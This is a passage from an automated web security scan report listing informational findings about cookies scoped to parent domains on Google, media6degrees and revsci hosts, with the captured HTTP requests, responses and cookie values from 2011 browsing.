GET /verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TPG+Capital
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=ShaN536VX1BT-W8jSCkNsB7UCdsHHBFwvL-fv0GuHA=AXsz92cQ6dNvC4Zp; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=8speeaESqyhrMgr9xX2f3dfNmJleRrlferTqXy3eJg=hbrRwBcbVI4mN8f5; expires=Fri, 11-Nov-2011 11:16:11 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:16:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.43. http://id.google.com/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; expires=Fri, 11-Nov-2011 11:28:26 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Greycroft+Partners&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=46=c4G1Ph4cKUL8vIy3rVGhga3EddhyprGFvKsEDbub=jlSNKhZPzqryPL-6; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; expires=Fri, 11-Nov-2011 11:28:26 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:28:26 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.44. http://id.google.com/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ; expires=Fri, 11-Nov-2011 11:28:36 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Kosmix&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ; expires=Fri, 11-Nov-2011 11:28:36 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:28:36 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.45. http://id.google.com/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=46=oTq4LnZEtdzKn7HNkb_Dta4Yn3_Wet9JeZqzzEO8WMho4oIfjoY99NXlJgtddLMrACItPbQPwVVZ_ffM733pwCwWO_lawUxZaY9bvbdTU3Wgu9sMqoN9ZaLEeF7qUu7D; expires=Fri, 11-Nov-2011 11:38:23 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Apollo+Global+Management
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=8speeaESqyhrMgr9xX2f3dfNmJleRrlferTqXy3eJg=hbrRwBcbVI4mN8f5; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=oTq4LnZEtdzKn7HNkb_Dta4Yn3_Wet9JeZqzzEO8WMho4oIfjoY99NXlJgtddLMrACItPbQPwVVZ_ffM733pwCwWO_lawUxZaY9bvbdTU3Wgu9sMqoN9ZaLEeF7qUu7D; expires=Fri, 11-Nov-2011 11:38:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 11:38:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.46. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2lkaebs01171xcfgwn0ixqhg0sl750073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
rdrlst=4041194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
sglst=20k0s9ullkzgkk03iy50023n000k00500arrll12l401wxl0013n000k00500c25ll2zip000000023o020k0250256bll2zip000000023o020k02502ag2lkmm960gd9r0053o020k045059rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500cgzlkmhha0gi1f0043n000k005000tilkmhha0gi1n0063o020k04506ahhll2zip000000023o020k025020klll12l401wxl0033o020k03503a6rlkmhha0cz3a0023f000j00500dlell12l401wxl0033o020k03503abflkmhha0cz3a0023f000j00500bo0ll2zip000000023o020k02502alhll2zip000000023o020k02502dg4lkmhha0gi1f0043n000k00500942ll2zip000000023o020k02502943lkzgkk03iy50023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1 HTTP/1.1
Host: idpix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6x0063o010k03505; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; acs=014020a0g0h1lkaebsxzt1sl6xxzt1sl6xxzt1p28s; rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2zip000000013o01; sglst=20k0s9ullkzgkk03iy50023n000k00500arrll12l401wxl0013n000k00500c25ll2zip000000013o010k0150156bll2zip000000013o010k01501ag2lkmm960gd9j0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500cgzlkmhha0gi1f0043n000k005000tilkmhha0gi1f0053o010k03505ahhll2zip000000013o010k015010klll12l401wxl0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxl0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2zip000000013o010k01501alhll2zip000000013o010k01501dg4lkmhha0gi1f0043n000k00500942ll2zip000000013o010k01501943lkzgkk03iy50023n000k00500

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl750073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4041194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: sglst=20k0s9ullkzgkk03iy50023n000k00500arrll12l401wxl0013n000k00500c25ll2zip000000023o020k0250256bll2zip000000023o020k02502ag2lkmm960gd9r0053o020k045059rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500cgzlkmhha0gi1f0043n000k005000tilkmhha0gi1n0063o020k04506ahhll2zip000000023o020k025020klll12l401wxl0033o020k03503a6rlkmhha0cz3a0023f000j00500dlell12l401wxl0033o020k03503abflkmhha0cz3a0023f000j00500bo0ll2zip000000023o020k02502alhll2zip000000023o020k02502dg4lkmhha0gi1f0043n000k00500942ll2zip000000023o020k02502943lkzgkk03iy50023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=Ad-QCIPSuQEQi4DI6wM&guid=ON&script=0
Content-Length: 0
Date: Thu, 12 May 2011 11:49:45 GMT

13.47. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLvv9C8Nbjpr557JDEzV6Qmy8vzjOnVlM1b8qoT6P/6jKqFB/AArMvE354eECpVFUpsB/ryF27g64s1oM+s/x82jWjDWUitF+udc3DBM6vFMHdu5LWXcWh1waMn+vD2Pi/6/opLpmA7/Gh0bU5IV0Qrx9dc6VHrKAlCT+hfLClNEUrJSkl2S16oTX7CbgSzypfrpc5VLHYI4c+tj2HEl9lfUdyQ9pWp2gRt3PQ1W9TQEiWXYkLtOkMeKKdqenqP8xd8DJgB9Wm9RFff5Q+bgLy4ePU1qoWyXDHQhYYX7yWeCZeEqilf95qoJAOocGO3qM+iYrceWGHRZq93uAomiKPWg7Z+zLzxGPJDp/fKjMPujah8JN+oi+DaZrQIKIYG6g2TSG1vnYEMZ2JbZVTVZhDxARFZleeWURff9Wx751+tKHaMu/xn3RYaKszrGZA6RlwCt+NuqPoznRX4vck+HldWUVG1A1qbpn3rL2sb/MVkLJXjka3vTLDQkmdGZktW+0pu0LESzKT7GnaXO5eZ+dSyKkA4Q48QAd77LWt2RfYKKjVpi9R/R1/W/RIUlUmivDsAZun9Uj65R1/ShixxdBZtXiudcxuvCsvcW/IdlomzTs7FHCC6AgFwCuDGL4ricj7NcRFR4JxEj7vN++KZFIy18++/lbJXdRgytPK59o4PzVl0T2OcajqS3RSO9NBPwab9+86ccnLs8ds1bjsFzEzKdf/V0iuMCNT7mRXjbxqJdzNQ2zz72+8KSOE9dc/lBj4aC/SyO3LegBHbbnrDHp+grjq8BMcNbn89X3XvY0r/Y8TxrMsLt20IVNBrHwqXzvLeRHtLmVV8weNvSWfkfe5sUSUrPZ1hobafq3mgOKAjfS7tG/VRENDOG21AH7Aspp8ZZAP4A7faTxGwUqJdFHvML5BWA1W48dpbdADNo3WtKmMY4HYawF8Ar2+H04UdeyvCc5nvQgoItg43GpvfcBLVk3+vCQB0wCo2nk3lJqm95+kCZG278se39Cw/iLIG1S3U9l8Fk6j1ydFvxo312YEoSNKI2370IUuJN2kcNHEQRxTLaRjWz9sNRM7mM5TSklUq76M/CaknlqZWm96YXib3fE5d29SK6/9opQVO5ZxJ1GnDnBa9Wu3wg1ngult5Gjm0pyTLRF5YiMj6e8lD2uBVjnTvz9hMTUO56RQBkZMwSiXRTs0QeV0NSQWJBbpg9J19+PqYrvnGFvj1q/LjTeriUaRU9gS2r+Pip5bOvrFA6kBzDJPzJiiYsNl5AwprDcx7KIxZMWNaHqhupRp5HKeDVtNBbHkuhxmbEzAemNrX58a+ern0c60eE/Ti9RfCOzrACEKzCE5EFzwS5Wpi4ek7JevMmowSdz+NZEmFg4WyzC1T0WJ+hNjJ3NNrjWRwjVM/Gf3tTRx6iX2j0PyDr//pq2pdZXZ7YD/zcp8n7qoNWRZbE6V7AEvfIY1u3o7lUJkRzOJRd2VBo28NOxEfzMDFtbZ1gAlvX5g==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K05539 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 